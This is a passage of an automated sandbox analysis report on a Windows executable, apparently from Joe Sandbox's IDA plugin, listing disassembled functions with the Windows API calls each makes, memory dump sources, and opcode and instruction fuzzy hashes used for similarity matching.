                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                    • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                    • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                    • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                    Function 00402344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 00402357
                    • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                    • GetAsyncKeyState.USER32(00000001), ref: 00402399
                    • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                    • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                    • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                    • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                    Function 004563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                    • TranslateMessage.USER32(?), ref: 0045645C
                    • DispatchMessageW.USER32(?), ref: 00456466
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • String ID:
                    • API String ID: 2108273632-0
                    • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                    • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                    • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                    • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                    Function 00458A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00458A30
                    • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                    • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                    • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                    • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                    • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                    Function 0045B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindowVisible.USER32(?), ref: 0045B204
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                    • _wcsstr.LIBCMT ref: 0045B289
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: 010481258782a9ac0136f1ce20d41722eaecc78a47f1c1a55077ec376a10d582
                    • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                    • Opcode Fuzzy Hash: 010481258782a9ac0136f1ce20d41722eaecc78a47f1c1a55077ec376a10d582
                    • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                    Function 00459307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                    • __itow.LIBCMT ref: 0045936A
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                    • __itow.LIBCMT ref: 004593A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • String ID:
                    • API String ID: 2983881199-0
                    • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                    • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                    • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                    • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                    Function 004012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                    • SelectObject.GDI32(?,00000000), ref: 0040135C
                    • BeginPath.GDI32(?), ref: 00401373
                    • SelectObject.GDI32(?,00000000), ref: 0040139C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                    • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                    • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                    • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                    Function 00464A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                    • __beginthreadex.LIBCMT ref: 00464AD8
                    • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • String ID:
                    • API String ID: 3824534824-0
                    • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                    • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                    • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                    • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                    Function 00458202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                    • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                    • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                    • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 842720411-0
                    • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                    • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                    • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                    • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                    Function 0045710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                    Download Yara Rule
                    APIs
                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                    • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                    • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                    • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                    Function 00465244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                    • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                    • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                    • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                    Function 0045810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                    • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                    • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                    • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                    Function 0045C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                    • MessageBeep.USER32(00000000), ref: 0045C226
                    • KillTimer.USER32(?,0000040A), ref: 0045C242
                    • EndDialog.USER32(?,00000001), ref: 0045C25C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
                    • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                    • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                    • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                    • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                    Function 004013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • EndPath.GDI32(?), ref: 004013BF
                    • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                    • SelectObject.GDI32(?,00000000), ref: 004013EE
                    • DeleteObject.GDI32 ref: 00401401
                    • StrokePath.GDI32(?), ref: 0040141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                    • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                    • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                    • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                    Function 00412CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                      • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                    • __swprintf.LIBCMT ref: 00412ECD
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
